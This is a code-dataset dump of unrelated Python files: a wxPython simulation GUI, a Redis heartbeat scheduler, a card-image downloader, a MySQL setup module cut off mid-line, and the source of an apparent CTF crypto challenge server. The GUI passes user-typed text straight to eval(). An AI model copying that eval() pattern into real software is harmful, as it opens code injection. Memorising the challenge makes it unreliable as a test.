self.on_save_plot, m_expt)\n menu_file.AppendSeparator()\n m_exit = menu_file.Append(-1, \"E&xit\\tCtrl-X\", \"Exit\")\n self.Bind(wx.EVT_MENU, self.on_exit, m_exit)\n self.menubar.Append(menu_file, \"&File\")\n self.SetMenuBar(self.menubar)\n\n def create_status_bar(self):\n self.statusbar = self.CreateStatusBar()\n\n def draw_interface(self):\n self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize )\n self.MainGrid.SetFlexibleDirection( wx.BOTH )\n self.MainGrid.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED )\n\n # PLOT\n Plot = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u\"Plot\" ), wx.VERTICAL )\n Plot.SetMinSize( wx.Size( 400,200 ) )\n self.plot_sizer = wx.BoxSizer(wx.VERTICAL)\n self.plot_sizer.Add(self.canvas, 1, wx.EXPAND | wx.ALL)\n Plot.Add( self.plot_sizer, 0, wx.ALL, 5 )\n\n # UPDATABLE\n Updatable = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u\"Updating\" ), wx.VERTICAL )\n # Updating mode\n UpdateModes = [\"Sequential\", \"CSequential\",\"Synchronous\"]\n self.UpdateMode = wx.RadioBox(self, wx.ID_ANY, \"Update Mode\", wx.DefaultPosition, wx.DefaultSize, UpdateModes, 1, wx.RA_SPECIFY_COLS)\n Updatable.Add( self.UpdateMode, 1, wx.EXPAND|wx.ALIGN_CENTER_HORIZONTAL, 5 )\n self.UpdateMode.Bind(wx.EVT_RADIOBUTTON, self.on_update_mode)\n # Plot view\n self.PlotView = wx.RadioBox(self, wx.ID_ANY, \"Plot view\", wx.DefaultPosition, wx.DefaultSize, [\"See all\", \"Follow\"], 1, wx.RA_SPECIFY_COLS)\n Updatable.Add( self.PlotView, 1, wx.EXPAND, 5 )\n self.PlotView.Bind(wx.EVT_RADIOBUTTON, self.on_view_update)\n # CL size\n CLSize = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u\"cL\" ), wx.VERTICAL )\n self.CL = wx.Slider( self, wx.ID_ANY, 1, 1, 200, wx.DefaultPosition, wx.DefaultSize, wx.SL_HORIZONTAL )\n self.Bind(wx.EVT_SLIDER, self.on_update_cl ,self.CL)\n CLSize.Add( self.CL, 0, wx.ALL, 5 )\n Updatable.Add( CLSize, 1, 0, 5 )\n self.CLStatus = wx.StaticText( self, wx.ID_ANY, u\"cL=1\", wx.DefaultPosition, wx.DefaultSize, 0 )\n CLSize.Add( self.CLStatus, 0, wx.ALL, 5 )\n\n # W0\n WZero = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u\"W0\" ), wx.VERTICAL )\n self.W0 = wx.TextCtrl( self, wx.ID_ANY, u\"(cL/L)*i*1.0\", wx.DefaultPosition, wx.DefaultSize, 0 )\n WZero.Add( self.W0, 0, wx.ALL, 5 )\n self.AddW0Btn = wx.Button(self, label=\"Set\")\n self.Bind(wx.EVT_BUTTON, self.on_update_w0 ,self.AddW0Btn)\n WZero.Add( self.AddW0Btn, 0, wx.ALL, 5 )\n self.W0Status = wx.StaticText( self, wx.ID_ANY, u\"W0(i,cL,L)=0.5\", wx.DefaultPosition, wx.DefaultSize, 0 )\n WZero.Add( self.W0Status, 0, wx.ALL, 5 )\n Updatable.Add( WZero, 1, wx.EXPAND, 5 )\n\n # SIMULATION CONTROLS\n Simulation = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u\"Simulation\" ), wx.HORIZONTAL )\n # Starting conditions\n self.StartConditions = wx.RadioBox(self, wx.ID_ANY, \"Starting\", wx.DefaultPosition, wx.DefaultSize, [\"Ferromagnet\", \"Antiferromagnet\", \"Random\"], 1, wx.RA_SPECIFY_COLS)\n self.StartConditions.SetSelection(self.datagen.mode)\n Simulation.Add( self.StartConditions, 1, wx.EXPAND, 5 )\n self.StartConditions.Bind(wx.EVT_RADIOBUTTON, self.on_update_start)\n # Boundaries\n self.Boundaries = wx.RadioBox(self, wx.ID_ANY, \"Boundaries\", wx.DefaultPosition, wx.DefaultSize, [\"Cyclic\", \"Sharp(table)\"], 1, wx.RA_SPECIFY_COLS)\n self.Boundaries.SetSelection(self.datagen.boundaries)\n Simulation.Add( self.Boundaries, 1, wx.EXPAND, 5 )\n self.Boundaries.Bind(wx.EVT_RADIOBUTTON, self.on_update_boundaries)\n # Time steps\n TimeSteps = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u\"Time steps\" ), wx.VERTICAL )\n self.Time = wx.TextCtrl( self, wx.ID_ANY, u\"100\", wx.DefaultPosition, wx.DefaultSize, 0 )\n wx.EVT_KEY_UP(self.Time, self.on_update_time_steps)\n TimeSteps.Add( self.Time, 0, wx.ALL, 5 )\n Simulation.Add( TimeSteps, 1, wx.EXPAND, 5 )\n # Startstop\n StartStop = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u\"Start/Stop\" ), wx.VERTICAL )\n self.StartStopBtn = wx.Button(self, label=\"Start\")\n self.Bind(wx.EVT_BUTTON, self.on_pause_button ,self.StartStopBtn)\n StartStop.Add( self.StartStopBtn, 0, wx.ALL, 5 )\n self.ResetBtn = wx.Button(self, label=\"Reset\")\n self.Bind(wx.EVT_BUTTON, self.on_reset_button ,self.ResetBtn)\n StartStop.Add( self.ResetBtn, 0, wx.ALL, 5 )\n Simulation.Add( StartStop, 1, wx.EXPAND, 5 )\n # Simulation speed\n SimulSpeed = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u\"Timestep lenght\" ), wx.VERTICAL )\n self.SimSpeed = wx.Slider( self, wx.ID_ANY, 100, 100, 1000, wx.DefaultPosition, wx.DefaultSize, wx.SL_HORIZONTAL )\n self.SimSpeed.Bind(wx.EVT_SLIDER, self.on_update_timestep)\n SimulSpeed.Add( self.SimSpeed, 0, wx.ALL, 5 )\n self.SimSpeedTxt = wx.StaticText(self, wx.ID_ANY, str(self.time_step)+\"ms\", wx.DefaultPosition, wx.DefaultSize)\n SimulSpeed.Add( self.SimSpeedTxt, 0, wx.ALL, 5 )\n Simulation.Add( SimulSpeed, 1, 0, 5 )\n\n self.MainGrid.Add( Plot, 1, wx.ALIGN_LEFT|wx.ALIGN_TOP, 5 )\n self.MainGrid.Add( Updatable, 1, wx.ALIGN_RIGHT|wx.ALIGN_TOP, 5 )\n self.MainGrid.Add( Simulation, 1, wx.ALIGN_BOTTOM|wx.ALIGN_LEFT, 5 )\n\n self.SetSizer( self.MainGrid )\n self.Layout()\n # self.Centre( wx.BOTH )\n\n\n def init_plot(self):\n self.dpi = 100\n self.fig = Figure((9.6, 3.7), dpi=self.dpi)\n self.axes = self.fig.add_subplot(1,1,1)\n self.axes.axes.get_xaxis().set_visible(False)\n self.axes.axes.get_yaxis().set_visible(False)\n self.fig.tight_layout()\n self.canvas = FigCanvas(self, -1, self.fig)\n self.plot_data = self.axes.matshow(self.data, aspect=\"auto\")\n\n def get_data(self):\n if self.plot_view == VIEW_MODE_FOLLOW:\n if len(self._data) > self.follow_last:\n return self._data[(-self.follow_last):]\n return self._data\n\n def set_data(self, value):\n self._data = value\n\n data = property(get_data, set_data)\n\n def draw_plot(self):\n self.plot_data.set_data(self.data)\n self.canvas.draw()\n if self.datagen.interations_left == 0:\n self.on_counter_0(None)\n\n def flash_status_message(self, msg, flash_len_ms=1500):\n self.statusbar.SetStatusText(msg)\n self.timeroff = wx.Timer(self)\n self.Bind(\n wx.EVT_TIMER,\n self.on_flash_status_off,\n self.timeroff)\n self.timeroff.Start(flash_len_ms, oneShot=True)\n\n def on_view_update(self, event):\n self.plot_view = self.PlotView.GetSelection()\n if self.plot_view == VIEW_MODE_FOLLOW:\n self.plot_data = self.axes.matshow(self.data, aspect=\"auto\")\n else:\n self.plot_data = self.axes.matshow(self.data, aspect=\"auto\")\n\n def on_pause_button(self, event):\n self.paused = not self.paused\n self.StartStopBtn.SetLabel(\"Start\" if self.paused else \"Stop\")\n if self.paused:\n self.Time.Enable()\n if not self.running:\n self.running = True\n self.data = [self.datagen.next()]\n self.plot_data = self.axes.matshow(self.data, aspect=\"auto\")\n self.lockdown_on()\n\n def on_reset(self, event):\n self.on_simulation_stop(event)\n self.data = [self.datagen.initialise()]\n self.plot_data = self.axes.matshow(self.data, aspect=\"auto\")\n\n def on_counter_0(self, event):\n self.on_simulation_stop(event)\n\n def on_simulation_stop(self, event):\n self.paused = True\n self.StartStopBtn.SetLabel(\"Start\")\n self.running = False\n self.lockdown_off()\n\n def on_save_plot(self, event):\n file_choices = \"PNG (*.png)|*.png\"\n\n dlg = wx.FileDialog(\n self,\n message=\"Save plot as...\",\n defaultDir=os.getcwd(),\n defaultFile=\"plot.png\",\n wildcard=file_choices,\n style=wx.SAVE)\n\n if dlg.ShowModal() == wx.ID_OK:\n path = dlg.GetPath()\n self.canvas.print_figure(path, dpi=self.dpi)\n self.flash_status_message(\"Saved to %s\" % path)\n\n def on_redraw_timer(self, event):\n # if paused do not add data, but still redraw the plot\n # (to respond to scale modifications, grid change, etc.)\n if not self.paused:\n self._data.append(self.datagen.next())\n self.Time.SetValue(str(self.datagen.interations_left))\n if self.datagen.interations_left <= 0:\n self.paused = True\n self.draw_plot()\n\n def on_exit(self, event):\n self.Destroy()\n\n def on_flash_status_off(self, event):\n self.statusbar.SetStatusText('')\n\n # Updatables\n def on_update_mode(self, event):\n selection = self.UpdateMode.GetSelection()\n if selection == UPDATING_SEQUENTIAL: # cl = 1\n cL = 1\n elif selection == UPDATING_CSEQUENTIAL: # 1 < cL < size\n cL = int(self.datagen.size/2)\n elif selection == UPDATING_SYNCHRONOUS: # cL = size\n cL = self.datagen.size\n self.on_update_cl(None, with_update_mode = False, cL = cL)\n self.datagen.cL = cL\n\n def on_update_cl(self, event, with_update_mode = True, cL = None):\n if cL == None:\n cL = self.CL.GetValue()\n if with_update_mode:\n if cL == 1:\n self.UpdateMode.SetSelection(UPDATING_SEQUENTIAL)\n elif cL == self.datagen.size:\n self.UpdateMode.SetSelection(UPDATING_SYNCHRONOUS)\n else:\n self.UpdateMode.SetSelection(UPDATING_CSEQUENTIAL)\n self.CL.SetValue(cL)\n self.CLStatus.SetLabel(\"cL=%i\" % cL)\n self.datagen.cL = cL\n\n def on_update_w0(self, event):\n eq = self.W0.GetValue()\n w0 = eval(\"lambda i=0, L=0, cL=0: \" + eq)\n try:\n w0(1,1,1)\n self.datagen.w0 = w0\n self.W0Status.SetLabel(\"W0(i,cL,L)=\"+eq)\n except:\n self.W0Status.SetLabel(\"ERR\")\n\n def on_update_timestep(self, event):\n self.redraw_timer.Stop()\n self.time_step = self.SimSpeed.GetValue()\n self.SimSpeedTxt.SetLabel(str(self.time_step)+\"ms\")\n self.Bind(wx.EVT_TIMER, self.on_redraw_timer, self.redraw_timer)\n self.redraw_timer.Start(self.time_step)\n\n # Start conditions\n def on_update_start(self, event):\n self.datagen.mode = self.StartConditions.GetSelection()\n\n def on_update_boundaries(self, event):\n self.datagen.boundaries = self.Boundaries.GetSelection()\n\n def on_update_time_steps(self, event):\n self.datagen.interations_left = int(self.Time.GetValue())\n event.Skip()\n\n def on_reset_button(self, event):\n self.on_reset(event)\n self.datagen.interations_left = 100\n self.Time.SetValue(\"100\")\n\n def lockdown_on(self, event=None):\n self.StartConditions.Disable()\n self.Time.Disable()\n self.Boundaries.Disable()\n\n def lockdown_off(self, event=None):\n self.StartConditions.Enable()\n self.Time.Enable()\n self.Boundaries.Enable()\n\nif __name__ == '__main__':\n app = wx.App()\n app.frame = GraphFrame()\n app.frame.Show()\n app.MainLoop()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"419891428","text":"\n\nfrom xai.brain.wordbase.nouns._subtitle import _SUBTITLE\n\n#calss header\nclass _SUBTITLING(_SUBTITLE, ):\n\tdef __init__(self,): \n\t\t_SUBTITLE.__init__(self)\n\t\tself.name = \"SUBTITLING\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"subtitle\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_subtitling.py","file_name":"_subtitling.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"139713581","text":"#!/usr/bin/python3\nimport ast\nimport operator as op\nimport secrets\n\nfrom multiprocessing import Process, Queue\n\n\n\noperators = {\n ast.Add: op.add,\n ast.Sub: op.sub,\n ast.Mult: op.mul,\n ast.Div: op.truediv,\n ast.Mod: op.mod,\n ast.Pow: op.pow,\n ast.LShift: op.lshift,\n ast.RShift: op.rshift,\n ast.BitOr: op.or_,\n ast.BitXor: op.xor,\n ast.BitAnd: op.and_,\n ast.FloorDiv: op.floordiv,\n ast.UAdd: op.pos,\n ast.USub: op.neg,\n ast.Not: op.is_not,\n ast.Invert: op.not_,\n}\n\n\ndef eval_expr(expr, ctx):\n return eval_(ast.parse(expr, mode=\"eval\").body, ctx)\n\n\ndef eval_(node, ctx):\n if isinstance(node, ast.Num):\n return node.n\n elif isinstance(node, ast.BinOp):\n return operators[type(node.op)](eval_(node.left, ctx), eval_(node.right, ctx))\n elif isinstance(node, ast.UnaryOp):\n return operators[type(node.op)](eval_(node.operand, ctx))\n elif isinstance(node, ast.Name):\n if node.id == \"literal\":\n raise ValueError(node)\n return ctx[node.id]\n elif isinstance(node, ast.Subscript):\n if node.value.id != \"literal\":\n raise ValueError(node)\n if not isinstance(node.slice, ast.Index):\n raise ValueError(node)\n index = eval_(node.slice.value, ctx)\n if not isinstance(index, int):\n raise ValueError(node)\n return ctx[\"literal\"][index]\n else:\n raise TypeError(node)\n\ndef encrypt_func(expr, literal, in_q, out_q):\n literal = ast.literal_eval(literal)\n\n while True:\n exited, random, vote = in_q.get()\n\n if exited:\n return\n\n bitflip = eval_expr(expr, {\n \"random\": random,\n \"vote\": vote,\n \"literal\": literal}\n )\n out_q.put(bitflip)\n\ndef decrypt_func(expr, literal, in_q, out_q):\n literal = ast.literal_eval(literal)\n\n while True:\n exited, encrypted_vote = in_q.get()\n\n if exited:\n return\n\n original_vote = eval_expr(expr, {\n \"encrypted_vote\": encrypted_vote,\n \"literal\": literal}\n )\n out_q.put(original_vote)\n\n\ndef score(literal, encrypt, decrypt):\n enc_in_q = Queue()\n enc_out_q = Queue()\n dec_in_q = Queue()\n dec_out_q = Queue()\n\n encrypt_proc = Process(\n target=encrypt_func,\n args=(encrypt, literal, enc_in_q, enc_out_q)\n )\n encrypt_proc.start()\n\n decrypt_proc = Process(\n target=decrypt_func,\n args=(decrypt, literal, dec_in_q, dec_out_q)\n )\n decrypt_proc.start()\n\n for x in range(20000):\n random = secrets.randbits(64) \n vote = secrets.randbelow(64)\n\n enc_in_q.put((False, random, vote))\n bitflip = enc_out_q.get()\n\n encrypted_vote = random ^ (1 << (bitflip % 64))\n\n dec_in_q.put((False, encrypted_vote))\n recovered_vote = dec_out_q.get()\n\n if recovered_vote != vote:\n enc_in_q.put((True, None, None))\n dec_in_q.put((True, None))\n encrypt_proc.join()\n decrypt_proc.join()\n return False\n if x % 1000 == 0:\n print(f'{x}/20000')\n\n enc_in_q.put((True, None, None))\n dec_in_q.put((True, None))\n encrypt_proc.join()\n decrypt_proc.join()\n return True\n\nprint('''=== ELECTION COMMISSION GRANT SUBMISSION SERVER ===\nWelcome! To apply for this grant you must show us your new vote encryption scheme.\n\nHere is how it works:\n- You will give us two expressions to evaluate: One for encryption and one for decryption\n- For the encryption:\n o We will give you a random 64 bit number as `random` and a vote from 0-63 as `vote`\n o You must give us back the index of a bit to flip in that 64 bit random number (0-63)\n o We will flip that bit in the original random number to get the encrypted value\n\n- For the decryption:\n o We will give you the encrypted vote as `encrypted_vote`\n o You must return the original vote\n- You are allowed one constant literal to use for both encryption and decryption\n- The encryption and decryption will be done separately so you cannot share information between them\n\nWe will test your crypto system 20000 times before we approve it.\n\nSound good? Alright lets get started!\n''')\n\nprint('Enter a constant literal: (ie `[1,2,3,4]`):')\nliteral = input()\nif len(literal) > 5000:\n print('Literal too long')\n exit(1)\n\nprint('Enter expression for vote encryption (ie `vote+100`).\\nYour inputs are `random`, `vote`, and `literal`: ')\nencrypt = input()\nif len(encrypt) > 10000:\n print('Encrypt expression too long')\n exit(1)\n\nprint('Enter expression for vote decryption (ie `encrypted_vote*2`).\\nYour inputs are `encrypted_vote`, and `literal`: ')\ndecrypt = input()\nif len(decrypt) > 10000:\n print('Decrypt expression too long')\n exit(1)\n\nif score(literal, encrypt, decrypt):\n with open('flag.txt') as f:\n print(f.read())\nelse:\n print('Sorry your system did not stand up to testing. Please feel free to reapply in the future!')\n","sub_path":"2020/crypto/flipstate/src/chal.py","file_name":"chal.py","file_ext":"py","file_size_in_byte":5021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"170420872","text":"# -*- coding: utf-8 -*-\r\nimport os\r\nimport shutil\r\n\r\ndef copyfiles(path):\r\n for roots,folder,files in os.walk(path):\r\n for i in files:\r\n if 'NG' in i:\r\n srcpath = os.path.join(roots,i)\r\n dstpath = os.path.join('D:\\\\pythonworkspace\\\\tensorflow-for-poets-2\\\\tf_files\\\\patch_set1\\\\NG',i) \r\n elif 'OK' in i:\r\n srcpath = os.path.join(roots,i)\r\n dstpath = os.path.join('D:\\\\pythonworkspace\\\\tensorflow-for-poets-2\\\\tf_files\\\\patch_set1\\\\OK',i)\r\n shutil.copy(srcpath,dstpath)\r\n\r\ncopyfiles('patch_set3')","sub_path":"tf_files/copyPatch.py","file_name":"copyPatch.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"542123460","text":"from django.core.management.base import BaseCommand\n\nimport os\nimport requests\nimport queue\nimport threading\nimport random\nimport time\n\nfrom cards.models import CardPrintingLanguage, Language\n\n\nclass Command(BaseCommand):\n help = 'Downloads the MtG JSON data file'\n\n download_thread_count = 8\n\n def add_arguments(self, parser):\n parser.add_argument(\n '--all-languages',\n action='store_true',\n dest='download_all_languages',\n default=False,\n help='Download all foreign languages (only English cards are downloaded by default)'\n )\n\n parser.add_argument(\n '--sleepy',\n action='store_true',\n dest='sleep_between_downloads',\n default=False,\n help='Sleep a random amount between each image to prevent overloading the image server'\n )\n\n def handle(self, *args, **options):\n\n if options['download_all_languages'] and not Language.objects.filter(name='English').exists():\n print('Only english card images are downloaded by default, but the English Language '\n 'object does not exist. Please run `update_database` first')\n return\n\n image_download_queue = queue.Queue()\n\n card_filter = CardPrintingLanguage.objects.filter(multiverse_id__isnull=False)\n if not options['download_all_languages']:\n card_filter = card_filter.filter(language=Language.objects.get(name='English'))\n\n for cpl in card_filter:\n image_download_queue.put(cpl)\n\n for i in range(1, self.download_thread_count):\n thread = ImageDownloadThread(image_download_queue, options['sleep_between_downloads'])\n thread.setDaemon(True)\n thread.start()\n\n image_download_queue.join()\n\n\nclass ImageDownloadThread(threading.Thread):\n def __init__(self, printlang_queue, random_sleep):\n threading.Thread.__init__(self)\n self.printlang_queue = printlang_queue\n self.has_random_sleep = random_sleep\n\n def run(self):\n while True:\n printing_language = self.printlang_queue.get()\n download_image_for_card(printing_language, self.has_random_sleep)\n self.printlang_queue.task_done()\n\n\ndef download_image_for_card(printing_language, random_sleep):\n image_path = printing_language.get_image_path()\n image_path = os.path.join('website', image_path)\n\n os.makedirs(os.path.dirname(image_path), exist_ok=True)\n\n if os.path.exists(image_path):\n print(f'Already downloaded {printing_language} ({printing_language.multiverse_id})')\n return\n\n print(f'Downloading {printing_language} ({printing_language.multiverse_id})')\n\n image_download_url = 'http://gatherer.wizards.com' + \\\n '/Handlers/Image.ashx?multiverseid={0}&type=card'\n\n stream = requests.get(\n image_download_url.format(printing_language.multiverse_id))\n\n with open(image_path, 'wb') as output:\n output.write(stream.content)\n\n if random_sleep:\n time.sleep(random.random())\n","sub_path":"sylvan_library/data_import/management/commands/download_card_images.py","file_name":"download_card_images.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"624446355","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom .beater import Beater\nfrom concurrent.futures import ProcessPoolExecutor as Executor, ThreadPoolExecutor as TExecutor, wait\nfrom redis import StrictRedis\nimport logging\nimport signal\n\nlogger = logging.getLogger(\"HeartbeatMaker\")\n\n\nclass HeartbeatMaker(object):\n def __init__(self, redis_url, prefix_key, beat_callback=None, callback_pars=None, max_beaters=20, beater_workers=1):\n self.redis_url = redis_url\n self.prefix_key = prefix_key\n self.beaters_key = self.prefix_key + \":beaters\"\n self.max_beaters = max_beaters\n self.beaters = set()\n self.beater_workers = beater_workers\n self.beat_callback = beat_callback\n self.callback_pars = callback_pars\n self.logger = logger\n self.beating = False\n\n redis = self._get_redis()\n bs = redis.smembers(self.beaters_key)\n if bs:\n for beater in bs:\n interval = int(beater)\n self.beaters.add(interval)\n\n def start(self):\n\n self.beating = True\n\n # 监视新的beater\n ps = self._get_redis().pubsub()\n ps.subscribe(self.prefix_key + \":new-interval\")\n\n def _exit(signum, frame):\n ps.unsubscribe()\n self.stop()\n\n signal.signal(signal.SIGINT, _exit)\n signal.signal(signal.SIGTERM, _exit)\n\n self.workers = Executor(max_workers=self.max_beaters)\n try:\n\n for interval in self.beaters:\n f = self._create_beater(interval)\n f.add_done_callback(lambda x: self.beaters.discard(interval))\n\n self.logger.warning('%d beater started' % len(self.beaters))\n\n self._watch_new_interval(ps)\n except KeyboardInterrupt:\n _exit(None, None)\n self.logger.warning('heartbeat maker exit')\n\n def stop(self):\n if self.beating:\n self.beating = False\n self.logger.warning('stoped')\n\n def clean(self):\n for interval in self.beaters:\n beater = Beater(self.redis_url, self.prefix_key, interval, self.beat_callback, self.callback_pars,\n self.beater_workers)\n beater.clean()\n self._get_redis().delete(self.beaters_key)\n self.beaters.clear()\n\n def beat_it(self, it, interval, par=None):\n self.omit_it(it)\n beater = Beater(self.redis_url, self.prefix_key, interval, self.beat_callback, self.callback_pars,\n self.beater_workers)\n beater.beat_it(it, par)\n self._get_redis().sadd(self.beaters_key, interval)\n self.beaters.add(interval)\n\n self._get_redis().publish(self.prefix_key + \":new-interval\", interval)\n\n def omit_it(self, it):\n for interval in self.beaters:\n beater = Beater(self.redis_url, self.prefix_key, interval, self.beat_callback, self.callback_pars,\n self.beater_workers)\n beater.omit_it(it)\n\n def _create_beater(self, interval):\n return self.workers.submit(_create_worker, self.redis_url, self.prefix_key, interval, self.beat_callback,\n self.callback_pars,\n self.beater_workers)\n\n def _watch_new_interval(self, ps):\n\n self.logger.warning('new-beater-watcher started')\n try:\n\n for item in ps.listen():\n if item['type'] == 'message':\n interval = int(item['data'])\n if interval not in self.beaters:\n self._create_beater(interval)\n self.beaters.add(interval)\n self.logger.info(\"创建新的Beater(interval=%d)\" % interval)\n\n except:\n self.logger.exception('等待新Beater时,出现异常')\n\n self.logger.warning('new-beater-watcher exit')\n\n def _get_redis(self):\n return StrictRedis.from_url(self.redis_url)\n\n\ndef _create_worker(redis_url, prefix_key, interval, beat_callback, callback_pars, worker_number):\n try:\n beater = Beater(redis_url, prefix_key, interval, beat_callback, callback_pars, worker_number)\n beater.start()\n except:\n logger.exception('worker出现异常')\n","sub_path":"HeartbeatMaker/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"344080853","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"RCSnail-Commons\",\n version=\"1.0.6\",\n author=\"Martin Liivak\",\n author_email=\"martin.liivak@gmail.com\",\n description=\"RCSnail AI project's common methods\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n install_requires=[\n \"numpy\",\n \"pyzmq\",\n \"ruamel.yaml\"\n ]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"518253644","text":"import numpy as np\n\n\t# Implémentation de l'algorithme d'intégration de Simpson selon l'équation 5.7 des directives du TP\ndef simpsonIntegration(function, a, b, n):\n\tn += 1 if (n%2 == 0) else 0\n\tx, h = np.linspace(a, b, n, retstep = True)\n\tf = function(x)\n\treturn h, h*(f[0] + f[-1] + 4*np.sum(f[1::2]) + 2*np.sum(f[2:-1:2]))/3\n\nf1 = lambda x : 3*x/(2*np.sqrt(x + 1))\nprimitive1 = lambda x : (x - 2)*np.sqrt(x + 1)\n\nerror = lambda calculated, actual : np.abs(calculated - actual)\n\nsteps = np.array([10**3, 10**4, 10**5, 10**6])\nx0, x1 = 0, 3\n\n\t# Calcul des valeurs de l'intégrale par la méthode de Simpson\nerrorArray, hArray, integralArray = np.array([]), np.array([]), np.array([])\nprint(\"Valeur de l’intégrale définie en 5.1 selon la méthode de Simpson\")\nfor i, j in enumerate(steps):\n\th, integral = simpsonIntegration(f1, x0, x1, j)\n\thArray = np.append(hArray, h)\n\tintegralArray = np.append(integralArray, integral)\n\terrorArray = np.append(errorArray, error(integral, (primitive1(x1) - primitive1(x0))))\n\tprint(f\"Avec N = {j} : {integral:.8f}, et une erreur de {errorArray[i]:.8E}\")\n","sub_path":"source/tp/5/question5.py","file_name":"question5.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"243092142","text":"import pymysql\n\n\ndef __get_params(path):\n f = open(path, 'r')\n params = f.readlines()\n f.close()\n params = [item.strip('\\n') for item in params]\n params[3] = int(params[3])\n return params\n\n\ndef init_db(path, DB_NAME): # Should be called when this project is executed first time\n params = __get_params(path)\n connection = pymysql.connect(host = params[0], user = params[1], password = params[2], port = params[3])\n cursor = connection.cursor()\n create_db_sql = \"CREATE DATABASE {} DEFAULT CHARACTER SET utf8\".format(DB_NAME)\n cursor.execute(create_db_sql)\n\n connection.select_db(DB_NAME)\n\n create_course_table_sql = \"CREATE TABLE IF NOT EXISTS Course (cID VARCHAR(30) NOT NULL, cName\\\n VARCHAR(300) NOT NULL, credits FLOAT NOT NULL, campus VARCHAR(150) NOT NULL,\\\n department VARCHAR(160) NOT NULL, term VARCHAR(150) NOT NULL, division\\\n VARCHAR(200) NOT NULL, prerequisites VARCHAR(1000), exclusion VARCHAR(1000), br\\\n VARCHAR(200), lecNum VARCHAR(30) NOT NULL, lecTime VARCHAR(125) NOT\\\n NULL, instructor VARCHAR(500), location VARCHAR(250), size INT(5),\\\n currentEnrollment INT(5), PRIMARY KEY (cID, term, lecNum)) CHARACTER SET=utf8\"\n cursor.execute(create_course_table_sql)\n\n create_eval_table_sql = \"CREATE TABLE IF NOT EXISTS Eval (department\\\n VARCHAR(160) NOT NULL, cID VARCHAR(30) NOT NULL, cName VARCHAR(300) NOT\\\n NULL, lecNum VARCHAR(30) NOT NULL, campus VARCHAR(150) NOT NULL, term\\\n VARCHAR(150) NOT NULL, instructor VARCHAR(150), instructorFullName\\\n VARCHAR(200), intellectuallySimulating FLOAT(10), deeperUnderstanding\\\n FLOAT(10), courseAtmosphere FLOAT(10), homeworkQuality FLOAT(10),\\\n homeworkFairness FLOAT(10), overallQuality FLOAT(10), enthusiasm FLOAT(10),\\\n workload FLOAT(10), recommend FLOAT(10), numInvited INT(10), numResponded\\\n INT(10), PRIMARY KEY (cID, term, lecNum, instructorFullName)) CHARACTER SET=utf8\"\n cursor.execute(create_eval_table_sql)\n\n print(\"database intialized\")\n\n connection.close()\n\n\ndef get_connection(path, DB_NAME):\n params = __get_params(path)\n connection = pymysql.connect(host = params[0], user = params[1], password = params[2], port = params[3], db = DB_NAME)\n return connection\n\ndef get_connection_with_dict_cursor(path, DB_NAME):\n params = __get_params(path)\n connection = pymysql.connect(host = params[0], user = params[1], password =\\\n params[2], port = params[3], db = DB_NAME,\\\n cursorclass=pymysql.cursors.DictCursor)\n return connection\n\ndef insert_course_data(cursor, info_dict):\n sql = \"INSERT INTO Course(cID, cName, credits, campus, department, term,\\\n division, prerequisites, exclusion, br, lecNum, lecTime, instructor,\\\n location, size, currentEnrollment) values(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n\n cID = info_dict['cID']\n cName = info_dict['cName']\n credits = info_dict['credits']\n campus = info_dict['campus']\n department = info_dict['department']\n term = info_dict['term']\n division = info_dict['division']\n prerequisites = info_dict['prerequisites']\n exclusion = info_dict['exclusion']\n br = info_dict['br']\n lecNum_list = info_dict['lecNum']\n lecTime_list = info_dict['lecTime']\n instructor_list = info_dict['instructor']\n location_list = info_dict['location']\n size_list = info_dict['size']\n currentEnrollment_list = info_dict['currentEnrollment']\n\n num_of_courses = len(lecNum_list) # this must be equal to len(info_dict['lecTime'], etc.\n\n for i in range(num_of_courses):\n print(cID)\n cursor.execute(sql, (cID, cName, credits, campus, department, term,\\\n division, prerequisites, exclusion, br, lecNum_list[i], lecTime_list[i],\\\n instructor_list[i], location_list[i], size_list[i], currentEnrollment_list[i]))\n\n\ndef insert_eval_data(cursor, info_dict):\n sql = \"INSERT INTO Eval (department, cID, cName, lecNum, campus, term,\\\n instructor, instructorFullName, intellectuallySimulating,\\\n deeperUnderstanding, 